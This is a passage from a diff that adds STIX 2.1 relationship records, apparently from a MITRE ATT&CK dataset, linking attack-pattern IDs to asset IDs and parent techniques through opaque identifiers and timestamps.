"x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32593c5a-c7e0-4175-9417-2f3049982c1a", + "created": "2024-06-26T15:28:25.958Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:28:25.958Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32650f89-c85e-47c0-b098-71458a7d18bc", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32730c7b-fb1f-412c-ab01-3932e9b4e0b0", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--327f65bc-8a33-4dbb-88d4-714a9e42442b", + "created": "2023-09-28T21:21:07.833Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:21:07.833Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32b386f2-c72d-45c5-b3ee-46718bd700b1", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32bcf2cf-3311-4ef1-9bf4-4bfe14832b3b", + "created": "2023-09-28T20:10:23.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:10:23.215Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32c82e19-0714-47d2-8814-423a71f0dc40", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32d15d1a-04ba-4035-907a-e2871425e8d1", + "created": "2023-09-28T20:28:40.722Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:28:40.722Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32d35bd7-e09b-4e92-b560-4adb1bac59d5", + "created": "2020-01-19T16:10:15.544Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32d96aee-4192-4c65-81ef-ced7256c3013", + "created": "2020-02-20T15:35:00.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33001f1f-a54d-4587-ba6b-1acb8acd52ea", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--330c49c0-a785-46f9-99c1-74322e26e20d", + "created": "2020-01-23T22:05:32.578Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--331668c5-ab68-41f0-8b5f-58bfe88575a8", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33174f62-7ebb-4c98-87fa-ae48a36bb035", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3334e647-fd5d-481d-a7f9-66f73911a57a", + "created": "2023-09-28T19:45:30.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:45:30.291Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3339e397-8b32-4e19-b678-19a7114853a7", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--333bb0b9-ec0e-4643-847a-c3012ca67146", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3354a975-5f4b-46f9-a659-34defd45d749", + "created": "2024-06-26T15:34:16.283Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:34:16.283Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--336c1ffa-8019-4901-a8ce-c722194a7fa1", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33817b7b-95eb-41d7-8c8f-61b4e7df1c64", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3381ecd9-cda7-4796-867b-49ac7bc29d06", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33942912-1707-4f44-9fc0-43826f1de9b7", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--339d1807-b243-42e7-beca-584d45c7a9ba", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--339efdaf-11b4-480b-b2c6-2c5b296a82d8", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33bc3e6f-e8cb-40ea-8088-3de39e2490a7", + "created": "2023-09-29T16:47:08.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:47:08.696Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33bc5bb5-415d-4f8d-875c-644bb3b65be4", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33d1d2c7-fe6e-43c0-a78a-40ec218d0895", + "created": "2020-03-13T20:12:41.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33dbc3b3-6083-43e7-8015-04fbfa9725b5", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33dcbea5-63a4-45e5-a944-d4721fe1d891", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33e33c74-2f17-4bac-bbba-bf4f2a2035e5", + "created": "2023-09-29T18:07:41.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:07:41.540Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33ed490e-3299-4c11-9d3f-54813bfb4342", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--33f31a16-8705-4612-811b-fecafa3d45a9", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--341bd389-e213-40e6-80d2-76170eb437da", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--342ea236-87cc-4dff-b30c-24d5f3ffe8c0", + "created": "2024-06-27T09:44:31.408Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:44:31.408Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--343f8f2b-39d1-48cb-8787-3a6eeab3ddf9", + "created": "2020-03-14T22:45:53.101Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--34407c81-aca5-477e-a978-a66f32ae6545", + "created": "2020-03-14T23:36:52.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--345edcc1-579e-4669-9261-db645f0ed451", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--346b77e3-e858-4f15-a4c5-8ab51b9b3bbb", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--346fa6de-95ec-4fb9-a2b8-6ba22b74f8d1", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": 